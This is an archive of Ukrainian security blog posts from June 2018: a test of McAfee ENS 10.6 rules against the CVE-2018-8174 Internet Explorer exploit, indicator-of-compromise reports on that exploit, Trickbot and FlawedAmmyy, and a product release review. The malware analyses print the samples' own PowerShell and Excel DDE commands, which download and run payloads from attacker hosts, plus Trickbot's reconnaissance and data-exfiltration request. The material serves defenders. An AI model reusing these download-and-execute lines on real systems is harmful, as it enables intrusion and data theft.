Archive | June 2018

9:1 або ENS10.6 vs IE exploit

Як правильно користуватися антивірусом, або чому я працюю з McAfee (частина #2)

Усім привіт!

Як людина, якій дуже часто доводиться мати справу з шкідливим кодом, я підготував для вас свіжий контент)

Продовжую знайомити вас із захисними механізмами, які приховує в собі ENS 10.6

Якщо хто пропустив першу частину (аналіз ефективності проти документу з макросом) – раджу почати з неї.

Ті, хто мене добре знають, вже розуміють, що я користуюся та налаштовую ENS не як антивірус, а як модуль аналізу поведінки. Просто я розумію, що в умовах сучасних масових/цільових атак файлові сигнатури та навіть хмарна репутація будуть запізнюватися. Тому я роблю ставку на інші методи захисту.

Але ближче до справи – вчора мені на очі трапилася реалізація експлойту #CVE-2018-8174 для доставки шкідливого коду. На відміну від попереднього прикладу, який я використав для розгляду можливостей ENS, цього разу для активації атаки достатньо перейти за посиланням через непатчений Internet Explorer (виправлення MS опублікували ще 08/05/18).

Це трохи відрізняється, від фішингу, де жертві усе ще треба відкрити документ або активувати скрипт. Тут усе зробить браузер.

Навіть виконає ескалацію привілеїв із обходом UAC. А це вже серйозно.

Кому потрібні деталі по експлойту – знайдете їх тут, а ми переходимо до захисту.

Перш ніж почати перевіряти надійність ENS, давайте змінимо стандартні (My Default) налаштування на більш посилені. Нижче я наведу приклади максимально жорстоких правил.

Увага! Не намагайтеся одразу перенести їх на свою інфраструктуру.

В кожному конкретному випадку, залежно від типу системи та характеру використання по цим правилам будуть свої списки виключень, а для деяких установ вбудовані правила краще замінити на додаткові користувацькі.

#1 Активуємо вбудовані правила з блоку Access Protection

(оскільки ми не знаємо на перед механізму дії експлойту то активуємо їх усі)

 

#2 Додаємо користувацьке правило для блокування нових .exe

(примітивне, проте захищає від 90% атак не залежно від типу обгортки/приманки)

#3 Додаємо правило заборони перехресного виклику

(захистить від приманок що залучають PowerShell – 70% )

#4 Для кращого контролю PowerShell активуємо додаткові сигнатури Exploit Prevention

(дозволить блокувати кодовані команди, приховані виклики і таке інше)

#5 Додамо користувацьке правило брандмауера для блокування вихідного трафіку

(захистить від довантаження payload у разі спрацювання 0day на інструменти ОС)

#6 Переглянемо параметри Web Control

(активуємо перевірку репутації файлів та посилань згідно хмари McAfee GTI)

#7 Перевіримо спрацювання користувацького правила Access Protection

(щоб пересвідчитися що шлях заданий вірно і захист вже активовано)

 

Ось тепер наша піддослідна тестова машина готова до зустрічі з експлойтом, спрацювання якого веде до запуску проміжного downloader`а та довантаження основного тіла троянського шкідливого коду.

 

Схема даної атаки (спрощена):

  1. Жертва переходить на інфіковану сторінку що містить експлойт
  2. Internet Explorer починає обробляти вміст сторінки, зокрема VBS скрипт
  3. Вразливість приводить до екскалації привілеїв в обхід UAC
  4. Internet Explorer виконанує довільний код – в даному випадку запуск mshta
  5. Далі відбувається обробка hta файлу що містить команди для PowerShell
  6. Виконується прихований запуск PowerShell для завантаження та запуску downloader`а
  7. Далі downloader перевіряє параметри системи та довантажує основне тіло payload

 

І так, шановні читачі, леді та джентльмени, увага! Почнемо шоу.

У синьому кутку рингу – експлойт CVE-2018-8174, все ще активний та небезпечний для тих, то не оновлює систему.

А у червоному кутку рингу – оновлений McAfee ENS із посиленими політиками.

Бій до останнього. Почали.

 

#1 Перший контакт – переходимо за посиланням і …

Web Control блокує обробку сторінки по репутації за даними GTI.

Система не ушкоджена.

1:0 на користь ENS

 

Вимикаємо Web Control адже наступна (інша) атака може проходити з URL який буде мати нормальну репутації (зламаний сайт державної установи або комерційної організації)

* а для тих, хто користується Web Gateway мій колега Олег перевірив захист на рівні web proxy:

 

#2 Другий раунд, повторна спроба переходу за посиланням і …

Отримуємо одразу два блокування. По порядку.

Друга атака експлойту блокується сигнатурою 6048 модулю Exploit Prevention – махінації із стеком, переповнення буферу.

Система не ушкоджена.

2:0 на користь ENS

 

Вимикаю блок по сигнатурі 6048 адже наступна (інша) атака може не стосуватися буферу.

 

#3 Третій раунд, повторна спроба переходу за посиланням і …

Друга атака експлойту блокується OnAccess Scan (OAS) по сигнатурі CVE яка спрацювала на вміст VBS в коді сторінки.

Система не ушкоджена.

3:0 на користь ENS

 

Вимикаю блок по сигнатурі 6048 адже наступна (інша) атака може використовувати експлойт, на який ще не буде сигнатури OAS.

 

#4 Четвертий раунд. Експлойт уже виснажений і намагається скавчати, проте бій продовжується.

Знову переходимо за посиланням і …

Спрацьовує вбудоване правило Access Protection (яке по замовчуванню вимкнене).

ENS блокує спробу IE внести зміни до реєстру (механіка вразливості).

Система не ушкоджена.

4:0 на користь ENS

 

Вимикаю блок для правила Access Protection адже наступна (інша) атака може застосовувати інші механізми.

 

#5 Рефері витягує наляканий експлойт з канатів знову на ринг. Бій продовжується.

Знову переходимо за посиланням і …

Спрацьовує користувацьке правило брандмауеру яке забороняє процесу MSHTA встановити вихідне з’єднання для обробки hta файлу, який містить команди для PowerShell.

Експлойт відпрацював, але обробка інструкцій і завантаження шкідливого коду не відбулися.

Усе чим відбувся користувач – помилка в роботі браузера.

Система не ушкоджена.

5:0 на користь ENS

 

Вимикаю блок для користувацького правила брандмауера адже наступна (інша) атака може застосовувати інші вбудовані механізми ОС в якості транспорту.

 

#6 Експлойт пригнічений та деморалізований. Лунає сигнал до бою.

Знову переходимо за посиланням і …

Експлойт спрацьовує, MSHA оброблює hta файл і намагається викликати PowerShell..

Але ENS спокійно (як Нео в фільмі “Матриця”) блокує цей підступний прийом завдяки користувацькому правилу Access Protection яким ми заборонили перехресний виклик cmd, powershell та mshta.

Система не ушкоджена.

6:0 на користь ENS

 

Вимикаю блок для користувацького правила Access Protection адже наступна (інша) атака може застосовувати інші вбудовані механізми ОС в якості транспорту.

 

#7 Навряд чи в реальних умовах жертва буде продовжувати спроби перейти за посиланням вже після перших блокувань, але наш бій продовжується.

Експлойт не полишає надії, адже ENS стримує атаки уже з відключеними 6ма захисними механізмами.

Знову переходимо за посиланням і …

Цього разу експлойт спрацьовує, MSHA оброблює hta файл і намагається викликати PowerShell..

Але ENS тримає удар! Завдяки сигнатурі 6070 яка відрізняє прихований виклик PowerShell.

Система не ушкоджена.

7:0 на користь ENS

 

Вимикаю блок по сигнатурі 6070 адже наступна (інша) атака може використовувати інший механізм доставки шкідливого коду.

 

#8 Восьмий раунд. Глядачі завмерли в очікуванні.

Експлойт біситься, адже перша фаза атаки проходить (і це лише після того як ми послабили захист ENS на 7 різних пунктів), але інфікування системи не відбувається.

Експлойт не завдає шкоди системі. Зловмисники не отримають результату.

Під галас глядачів рефері знов виштовхує переляканий експлойт на ринг. Лунає сигнал до бою.

Знову переходимо за посиланням і …

PowerShell виконує передані на цього інструкції і намагається завантажити та записати файл downloader`а..

Але знову ENS перемагає! Спрацьовує вбудоване правило Access Protection яке блокує створення нових файлів у каталозі Windows (правило по замовчуванню вимкнене).

Зверніть увагу, що в даному випадку, завдяки ескалації привілеїв, зловмисники намагаються записати .exe не в каталог користувача, а у C:\Windows\Temp, куди звичайному користувачу доступу нема.

Також зауважте, в даному випадку користувацьке правило на створення та запуск .exe у C:\Users\**\ не знадобилося, але у тих випадках, коли атака проходить без ескалації привілеїв вони вас захистить.

Система не ушкоджена.

8:0 на користь ENS

 

Вимикаю блок для користувацького правила Access Protection адже наступна (інша) атака може записувати файли в інші каталоги.

 

#9 Я думаю, що читачам уже й так усе зрозуміло. Але ж бій має йти до кінця, так?

Експлойт знає, що ENS майже повністю деактивований, функціонує менша частина захисту.

На цьому місці глядачі (читачі) згадують кульмінацію фільмів “Роккі” з Сильвестром Сталлоне ))

Дев’ятий раунд.

Знову переходимо за посиланням і …

експлойт проводить нокдаун завантаження та запуск downloader`а.

Перший удар, який ENS пропустив (після деактивації 8 ешелонів захисту!)

Усі завмерли. Експлойт, нападники уже відкорковують шампанське, так, шкідливий .exe-шник запустився на системі..

Але що це?

На останньому подиху ENS через брандмауер блокує спробу downloader`а з’єднатися із С2 і не дозволяє довантажити payload.

Система скомпрометована, проте ексфільтрації даних та довантаження payload не відбулося.

9:1 на користь ENS

 

Ображений експлойт скавчить, тікає з рингу і забивається у темний куток))

Якось так =)

Щоб вам було цікавіше це читати, я намагався подати мої екзерсиси з тестуванням як боксерський раунд. Сподіваюсь, це на завадило вам зрозуміти основний меседж – навіть без сигнатур, в умовах 0day атаки, за умови правильних політик, ENS може надійно протистояти широкому діапазону атак, як через фішинг так і через експлойти вбудованих механізмів ОС.

Зрозуміло, що на практиці, бізнес не стане працювати з усіма обмеженнями які я задіяв в даному випадку, але порівняно із “просто файловим сканером”, McAfee ENS надає вам можливості адаптувати захист під ваші умови.

Якщо ви навчитеся користуватися усім функціоналом ENS, а не лише OAS, тоді відсутність своєчасних оновлень Windows чи Office не буде становити високої загрози для ваших систем.

 

Ще раз звертаю увагу, що параметри/політики в даному тесті були не default.

І я закликаю вас не використовувати політики по замовчуванню.

Висновки робіть самі:

  • Default політики – Web Control, OAS, Exploit Prevention 6048 – 3 (три) блоки до зараження
  • Активація базових правил – Web Control, Exploit Prevention 6048, OAS, AP_reg, Exploit Prevention 6070, AP_exe_Win – 6 (шість) блоків до зараження
  • Базові + користувацькі – Web Control, Exploit Prevention 6048, OAS, AP_reg, Firewall-1, AP_2ps, Exploit Prevention 6070, AP_exe_Win, Firewall-2 9 (дев’ять) блоків до зараження

Сподіваюсь, дана публікація буде корисною як для користувачів McAfee так і для тих, хто користується іншими засобами захисту – а ви на базі свого рішення такі заборони ввести можете?

Залишайтеся з нами.

Слідкуйте за нашою сторінкою в FaceBook

Усім гарного дня.

Будьте уважні та обережні.

Знайте вашу зброю та вмійте нею користуватися.

VR

Advertisements

IOC_18-8174_180618

Доброго ранку, панове.

Відстежуємо способи доставки шкідливого коду через вразливість Internet Explorer.

#CVE-2018-8174 призводить до виконання довільного коду через обробку VBS в коді сторінки.

Рівень загрози, для організацій котрі застосовують не оновлений IE в якості основного – високий.

А для тих, хто уважно читає наші поради, контролює powershell та створення нових exe – низький.

Хочемо звернути вашу увагу на цей випадок, оскільки до цього левова частка зразків запускалися через активацію приманки користувачем.

В даному випадку переходу за посиланням достатньо. Максимум – IE запитає користувача чи активувати ActiveX компоненти.

Ми весь час розбирали різні варіанти обгорток що проходять через фішинг.

Разом із тим радимо не забувати про своєчасне оновлення бравзерів та застосування URL фільтрації і фільтрації мережевих експлойтів (Network / Host IPS.)

На що треба звернути увагу:

  • (!) Сервер з експлойтом та проміжним dropper`ом досі активний
  • (!) Станом на 19-те число знову достпні обидва payload
  • (!) Вразливість дозволяє ескалацію привілеїв із обходом UAC
  • Попередній пункт означає, що все, що затягує debug запускається вже від рівня System
  • В цьому випадку проміжний dropper записується у C:\Windows\Temp (по замовчуванню не доступна для звичайного користувача)
  • Весь процес інфікування займає 1-2 хв
  • Активація експлоту приводить до обробки hta файлу, який передає інструкції на powershell (далі усе стандартно)
  • Шлях та ім’я з яким записується і запускається downloader чітко вказані в hta (not random)
  • Dropper та Payload не кодовані (!This program cannot be run in DOS mode.)
  • Зразок не зачищає за собою файли у C:\Windows\Temp
  • Прав Адміністратора не потребує, проте отримує їх при виконанні

І так, проблеми будуть у тих, хто:

  • Використовує не оновлений Internet Explorer (більше 50% організацій)
  • Не заборонили завантаження через powershell та mshta (більше 50% організацій)
  • На блокують несанкціоноване завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

 Схема атаки:

URL > unpatched IE > .html (vbs) > exploit > 
mshta > powershell > GET debug.exe > C:\Windows\temp\debug.exe

Маркери IOC:

SHA-256        7844b3992af7820a8818bf02d8578bcfe0e745712c90b4e52471fd48a595b9e9
File name   3.html
File size      10.1 KB
SHA-256        e484cfd79e8041ad63df663f765e21facdc835df3460c99016ae44c12760b415
File name   wm.hta
File size      316 B

SHA-256 b9215c70ef59ce882f7415e698c5a383273b76a8fc599cb73ea15f33b0315142
File name 1.exe
File size 304.59 KB
SHA-256 82282f5c39347adadbaddce72da905c2beae1a2b68facc8dc22cf6c3485de604
File name 2.exe
File size 84 KB

Активність по процесам:

"C:\Program Files\Internet Explorer\iexplore.exe" >>        111.73.46{.} 110:2233        GET /3.html

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1960 CREDAT:144385 /prefetch:2

C:\Windows\SysWOW64\mshta.exe h11p://111.73.46{.} 110:2233/wm.hta

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

-windowstyle hidden (new-object System.Net.WebClient).DownloadFile('h11p://111.73.46{.} 110:2233/debug.exe', 'c:/windows/temp/debug.exe'); c:/windows/temp/debug.exe

"C:\windows\temp\debug.exe"

C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\windows\temp\debug.exe > nul

 Мережеві IOC:

Сторінка яка містить експлойт:

111.73.46{.} 110:2233        GET /3.html HTTP/1.1  Mozilla/5.0  – обробляється IE

Hta файл:

111.73.46{.} 110:2233        GET /wm.hta HTTP/1.1 Mozilla/4.0 – обробляється mshta

Проміжний dropper:

111.73.46{.} 110:2233        GET /debug.exe HTTP/1.1             – завантажується через PowerShell

Payload – обидва доступні!:

111.73.46.110:2233             GET /1.exe HTTP/1.1    Mozilla/4.0  – завантажується через debug.exe

111.73.46.110:2233             GET /2.exe HTTP/1.1    Mozilla/4.0  – завантажується через debug.exe

 Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із вказаним URL
  • Застосування шлюзів очистки web трафіку та IPS/IDS або HIPS (ENS 10.6)

Зверніть увагу на ефективність McAfee Web Gateway:

#1 Блок по фільтру геолокації

#2 Блок по репутації

#3 Блок по сигнатурі файлу

#4 Блок по CVE вразливості

Отже, правильно налаштований Web Gateway зробив 4 блоки. Дуже хороший результат.

Спрацювання ENS на вміст вебсторінки:

  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

P.S.

Перевірити, чи вразливий ваш IE до цього екслойту можна за допомогою PoC:

https://github.com/smgorelik/Windows-RCE-exploits/tree/master/Web/VBScript

Про використання данної вразливості популярними exploit-kit читайте тут:

https://malware.dontneedcoffee.com/2018/05/CVE-2018-8174.html

Детальний технічний аналіз самої вразливості тут:

http://blogs.360.cn/blog/cve-2018-8174-en/

Будьте уважні та обережні!

Очікуйте окрему статтю про ефективність модулів ENS 10.6

VR

IOC_Trickbot_110618

Доброго ночі, панове.

Перепрошую, що турбую в неробочий час, але інформація важлива.

В минулий понеділок, 11го числа, після обіду походила розсилка документів з макросами,

активація яких призводила до інфікування систем трояном типу #Trickbot.

Ми отримали зразок фішингового листа від однієї з компаній лише кілька годин тому:

Приманка досі функціонує, а основне тіло активно передає інформацію з інфікованих систем.

Шість днів поспіль вони продовжують збирати інформацію.

Так, уже майже усі антивіруси внесли і документ і payload в свої сигнатури.

Але ми дбаємо про вас, тому вирішили надати звіт із маркерами щоб ви могли пересвідчитися, що ваші системи ця зараза оминула.

Нагадую, що #Trickbot є модульним ШПЗ, яке використовується для збору даних та стеження.

Може довантажувати різні модулі для шифрування або віддаленого керування.

Рівень загрози, для організацій котрі не блокують макроси та не контролюють PowerShell і створення .exe, – високий.

А для тих, хто уважно читає наші поради – низький.

На що треба звернути увагу:

  • Один із серверів, що розповсюджує частини malware досі активний
  • Завантаження payload силами powershell через його виклик з cmd
  • Шлях та ім’я з яким записується і запускається downloader чітко вказані (not random)
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Виконання проходить із затримкою ~2-3 хв
  • Зразок не зачищає за собою файли у %temp% після міграції в %apdata%
  • Перевірку IP та звернення до Windows Update здійснює процес Oeuin_r.exe
  • Зразок також довантажує з windowsupdate.com кореневі сертифікати
  • А от передача зібраних даних уже через інжектований svchost
  • Прав Адміністратора не потребує

І так, проблеми будуть у тих, хто:

  • Не блокують макроси (90% державних установ)
  • Не заборонили завантаження через powershell (більше 50% організацій)
  • Не заборонили мережевий трафік для powershell (більше 50% організацій)
  • На блокують несанкціоноване завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

 Схема атаки:

Email attach (.doc) > macro > cmd > powershell > 2 URL > GET no.bin > %temp%\Oeuin_r.exe

Маркери IOC:

документ

SHA-256        5e7a1ed5f9a1fbc9d7148fbc28a379dc0067508844b6d342084d26b75c995d4f
File name   75812277127A00113A.doc
File size      69 KB

Макрос містить 2 URL:

h11p:\onetimewonders{.} com/no.bin    (!) досі активний

h11p:\nepalhiking{.} com/no.bin           (404) файл вже видалено

сновна частина

SHA-256    503c5c3cb68e1e057df4b99fe338d65d44d4c6e1f49396929d3fff66044505af
File name   no.bin       >> %temp%\Oeuin_r.exe        !This program cannot be run in DOS mode.
File size      338 KB

Відкриває з’єднання із С2

h11p\188.124.167.132:8082/ser0611/hostname.UID

Активність по процесам:

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde

"C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function mhioxqxcz1([String] $lcambw5)

{(New-Object System.Net.WebClient).DownloadFile($lcambw5,''C:\tmp\Oeuin_r.exe'');

Start-Process ''C:\tmp\Oeuin_r.exe'';}try{mhioxqxcz1(''h11p\onetimewonders{.} c0m/no.bin'')}catch{mhioxqxcz1(''h11p\nepalhiking{.} c0m/no.bin'')}'""

| Out-File -encoding ASCII -FilePath C:\tmp\wcwwirbmn.bat;Start-Process 'C:\tmp\wcwwirbmn.bat' -WindowStyle Hidden"

C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\wcwwirbmn.bat" "

PowerShell  "function mhioxqxcz1([String] $lcambw5){(New-Object System.Net.WebClient).

DownloadFile($lcambw5,'C:\tmp\Oeuin_r.exe');

Start-Process 'C:\tmp\Oeuin_r.exe';}try{mhioxqxcz1('h11p\onetimewonders{.} c0m/no.bin')}catch{mhioxqxcz1('h11p\nepalhiking{.} c0m/no.bin')}

"C:\tmp\Oeuin_r.exe"

C:\Users\operator\AppData\Roaming\coplane\Oeuin_s.exe

C:\Windows\system32\svchost.exe

Збір інформації вбудованими засобами ОС:

C:\Windows\system32\cmd.exe /c ipconfig /all

C:\Windows\system32\cmd.exe /c net config workstation

C:\Windows\system32\cmd.exe /c net view /all

C:\Windows\system32\cmd.exe /c net view /all /domain

C:\Windows\system32\cmd.exe /c nltest /domain_trusts

C:\Windows\system32\cmd.exe /c nltest /domain_trusts /all_trusts

Закріплення через планувальник задач:

\MsWinToken      c:\users\operator\appdata\roaming\coplane\oeuin_s.exe        11.06.2018 10:46

Мережеві IOC:

Завантаження основного тіла:

68.65.120.85      onetimewonders{.} c0m       GET /no.bin HTTP/1.1

Перевірка Public IP:

216.239.32.21    ipinfo.io     GET /ip      HTTP/1.1    Mozilla/5.0

Комунікація з Windows Update (довантаження кореневих сертифікатів):

91.223.19.232    www.download.windowsupdate.com       GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1   Microsoft-CryptoAPI/6.1

Трафік інфікованої системи:

svchost.exe 2948 TCP   216.239.32.21    80     ESTABLISHED

svchost.exe 2948 TCP   200.111.167.227 449   ESTABLISHED

svchost.exe 2948 TCP   91.223.19.232    80     ESTABLISHED

svchost.exe 2948 TCP   37.230.113.54    447   ESTABLISHED

svchost.exe 2948 TCP   200.111.167.227 449   ESTABLISHED

svchost.exe 2948 TCP   65.30.201.40      443   SYN_SENT

Передача інформації про інфіковану систему:

188.124.167.132:8082         POST /ser0611/hostname_UID HTTP/1.1 test

А тепер саме головне – яку інформацію отримують нападники:

POST /ser0611/APM11_W617601.66340B99AFAFEB9431CE688A2D6B8FF8/90 HTTP/1.1

Content-Type: multipart/form-data; boundary=Arasfjasu7

User-Agent: test

Host: 188.124.167.132:8082

Content-Length: 4941

Cache-Control: no-cache

–Arasfjasu7

Content-Disposition: form-data; name=”proclist”

 

***PROCESS LIST***

[System Process]

System

smss.exe

csrss.exe

wininit.exe

csrss.exe

winlogon.exe

services.exe

lsass.exe

lsm.exe

–Arasfjasu7

Content-Disposition: form-data; name=”sysinfo”

 

***SYSTEMINFO***

Host Name – APM11

OS Name – Microsoft Windows 7 ……………………..

OS Version – Service Pack 1

OS Architecture – 64-bit

Product Type – Workstation

Build Type – Multiprocessor Free

Registered Owner – operator

Registered Organization –

Serial Number – 55041-007-1767687-86688

Install Date – 30/12/1899 00.00.00

Last Boot Up Time – 30/12/1899 00.00.00

Windows Directory – C:\Windows

System Directory – C:\Windows\system32

Boot Device – \Device\HarddiskVolume1

Total Physical Memory – 3651 Mb

Available Physical Memory – 3651 Mb

/c ipconfig /all

Ethernet adapter eth0:

….

/c net config workstation

…… ………………..                                \\APM11

………… …… ………………..                         APM11

…… ……………………                              operator

/c net view /all

.. ………… …… ……………….

/c net view /all /domain

.. ………… …… ……………….

/c nltest /domain_trusts

…. ………….. …………………. ………….. …………: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

/c nltest /domain_trusts /all_trusts

…. ………….. …………………. ………….. …………: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

–Arasfjasu7–

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Блокування несанкціонованої доставки запускних на рівні Web та Email шлюзів
  • Перевірка каталогів
    • %temp%\Oeuin_r.exe
    • %temp%\wcwwirbmn.bat
    • %appdata%\coplane\Oeuin_s.exe
  • Перевірка планувальника системи на наявність задачі \MsWinToken         c:\users\%жертва%\appdata\roaming\coplane\oeuin_s.exe
  • По можливості – відмова від макросів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона специфічного виклику PowerShell та виконання кодованих команд – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

ENS 10.6 – посилений захист

12 червня відбувся реліз оновленої версії McAfee Endpoint Security 10.6

– провідного модульного рішення для захисту Windows систем.

Тим, хто не знайомий з антивірусом McAfee взагалі, я рекомендую швидко переглянути

мою коротку інструкцію по правильному застосуванню ENS – щоб краще розуміти можливості ENS.

Давайте розглянемо якісні зміни порівняно із лінійкою 10.5.х, адже не секрет, що для замовників,

котрі здійснили міграцію з VSE або інших АВ, основним робочим інструментом зараз є 10.5.3 / 10.5.4

Але переш ніж перейти до розгляду новин по Windows-версії антивірусу, давайте я зазначу 2 моменти, які мене особисто дуже тішать:

Для оператора консолі ePO це серйозно посилює контроль за не-Windows системами.

 

А тепер що стосується Endpoint Security 10.6 (Windows)

#1 оновлення із попередніх версій

Щоб спростити замовникам процедуру переходу на актуальну версію, McAfee створили

Endpoint Upgrade Assistant, який аналізує версії поточних модулів та приймає рішення – чи можна

оновитися одразу, чи потрібне видалення застарілого продукту. Як результат – менше помилок в процесі розгортання.

Як бонус, Endpoint Upgrade Assistant може автоматично разом з ENS оновити і модуль Active Response (якщо такий використовується).

Варто зазначити, що у мене на одній із тестових систем standalone 10.5.3 цілком коректно оновився до 10.6 із збереженням моїх політик:

#2 підтримка 1803 Windows 10 та Windows Server 2016

Тут усе просто – замовники, яким потрібен захист оновлених версій серверів та робочих станцій можуть одразу розгортати 10.6 (або оновити 10.5.4 до 10.6)

#3 зміни у блоці Threat Prevention

  • інтеграція із MS Antimalware Scan Interface (AMSI) для Windows 10 та 2016 – якщо MS вбудовує АВ в систему, то чому б цим не скористатися?
  • логи спрацювання правил Exploit Prevention тепер містять ключі команд – так легше відрізняти реальні загрози від false-positive
  • мої улюблені правила Access Protection поповнилися ще двома – WSL та Doppelganging
  • можливість активації глобальних виключень та можливість робити виключення за IP адресами

#4 зміни у блоці Web Control

  • нарешті полагодили підтримку актуальних браузерів (FF, Chrome)
  • запити на GTI по перевірці завантажуваних файлів тепер по SHA-256 замість MD5

#5 зміни у блоці Firewall

  • можливість прийняття рішення якщо GTI не доступний

#6 зміни у блоці Adaptive Threat Protection

  • окремий параметр по перевірці мережевих дисків
  • можливість запускати Real Protect в offline без TIE чи GTI
  • Observe Mode тепер з коробки вимкнутий
  • запити на GTI по перевірці файлів тепер по SHA-256 замість MD5
  • DAC може блокувати довірені процеси при спробі обробки недовіренних DLL

#7 зміни по роботі із документацією

Новий портал для пошуку документації по рішенням McAfee:

https://docs.mcafee.com/

Досить зручно та швидко, як альтернатива PDF файлам.

На цьому короткий огляд завершено.

Більш детальна інформація:

Endpoint Security 10.6 – Release Notes

Endpoint Security 10.x – Supported operating systems

Endpoint Security 10.6 – Known Issues

Будьте уважні та обережні.

Знайте можливості ваших засобів захисту та не залишайте політики By Default!

Слідкуйте за оновленнями.

VR

IOC_FlawedAmmyyRAT_070618

Доброго вечора, панове.

Сьогодні була зафіксована спроба інфікування #FlawedAmmyy (RAT).

Ми вже розглядали схожий зразок 25.05.18

Зверніть увагу! Новий трюк для обходу фільтрів

Цього разу для розповсюдження застосували excel web query file (.iqy) із посиланням на ресурс

# FlawedAmmyy застосовується для віддаленого керування інфікованими системами.

Рівень загрози, для організацій котрі не контролюють PowerShell та створення .exe, – високий.

А для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

  • Сервер, що розповсюджує частини malware досі активний
  • .iqy та блокування GET запитів дають низький рейт приманки на VT
  • Перші 2 кроки залучають Excel та PowerShell для завантаження і запуску проміжного downloader`а
  • Шлях та ім’я з яким записується і запускається downloader чітко вказані (not random)
  • Файл downloader’а та основної частини не кодований (!This program cannot be run in DOS mode.)
  • Файл downloader’а має дійсний цифровий підпис #valid Comodo code signing certificate, serial: ‎00 fe 83 cb 39 3a 8f 1d 5e d0 15 3e a2 fa ce 24 36
  • %temp% \ cmd_.exe – downloader
  • C:\Program Data\Settings\wsus.exe – payload
  • Прав Адміністратора не потребує
  • По при цікавий підхід, нічого нового. Не варто боятися. Дивіться блок Контрзаходи

І так, проблеми будуть у тих, хто:

  • Не заборонили передачу команд cmd > powershell (більше 50% організацій)
  • Не заборонили завантаження через powershell (більше 50% організацій)
  • Не заборонили мережевий трафік для powershell (більше 50% організацій)
  • На блокують завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

 Схема атаки:

Email attach (.iqy) > URL > excel dde > cmd > powershell > %temp%\cmd_.exe

h11p://thespecsupportservice{.} com

#1    excel         /duo.dat     (ps command-1)

#2    powershell  /uno.dat     (ps command-2)

#3    powershell  /dr.png      (exe-1, downloader)

#4    cmd_.exe   /load.png   (exe-2, RAT)


Маркери IOC:

SHA-256        28d391bf7aa72d59a387bfaba099d9e176ee976959a4f99b8d04dbeef75e76b5
File name   sale_30_2726192.iqy (Order_9852340015894_07062018.iqy або Purchase_2603683074_07062018.iqy)
File size      69 B

#1 thespecsupportservice{.} com     POST /duo.dat  Mozilla/4.0

зміст:

=cmd|’ /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

-nop -NoExit -c IEX ((new-object net.webclient).

downloadstring(\”h11p://thespecsupportservice{.} com/uno.dat\”))’!A0

#2 thespecsupportservice{.} com     GET /uno.dat

зміст:

$urls = “h11p://thespecsupportservice{.} com/dr.png”,””

foreach($url in $urls){

Try

{

        Write-Host $url   

        $fp = “$env:temp\cmd_.exe”

        Write-Host $fp

        $wc = New-Object System.Net.WebClient

        $wc.DownloadFile($url, $fp)

        Start-Process $fp

        break

}

Catch

{

#3 thespecsupportservice{.} com     /dr.png

SHA-256        7f9cedd1b67cd61ba68d3536ee67efc1140bdf790b02da7aab4e5657bf48bb6f
File name   dr.png >> cmd_.exe
File size      178.97 KB
Проміжний downloader, завантажує останню частину – основний модуль

#4 thespecsupportservice{.} com     /load.png

SHA-256    ba8ed406005064fdffc3e00a233ae1e1fb315ffdc70996f6f983127a7f484e99
File name   DBhFVevZa.exe >> wsus.exe
File size      651.47 KB

Відкриває з’єднання із С2

Активність по процесам:

"C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE" /e
C:\Windows\SysWOW64\CMD.EXE CMD.EXE  /c C:\Windows\System32\WindowsPowerShell\v1.0\
powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).
downloadstring(\"http://thespecsupportservice{.} com/uno.dat\"))
C:\Windows\System32\WindowsPowerShell\v1.0\
powershell.exe  -nop -NoExit -c IEX ((new-object net.webclient).
downloadstring(\"http://thespecsupportservice{.} com/uno.dat\"))
"C:\tmp\cmd_.exe"

"C:\Windows\System32\cmd.exe" /C net.exe stop ammyy
C:\Windows\SysWOW64\net.exe C:\Windows\system32\net1  stop ammyy
"C:\Windows\System32\cmd.exe" /C sc delete ammyy
"C:\Windows\System32\cmd.exe" /C net.exe stop foundation
"C:\Windows\System32\cmd.exe" /C sc delete foundation

C:\ProgramData\Settings\wsus.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\net.exe
C:\Windows\system32\net1  user /domain
C:\Windows\SysWOW64\nslookup.exe
C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\tmp\cmd_.exe >> NUL
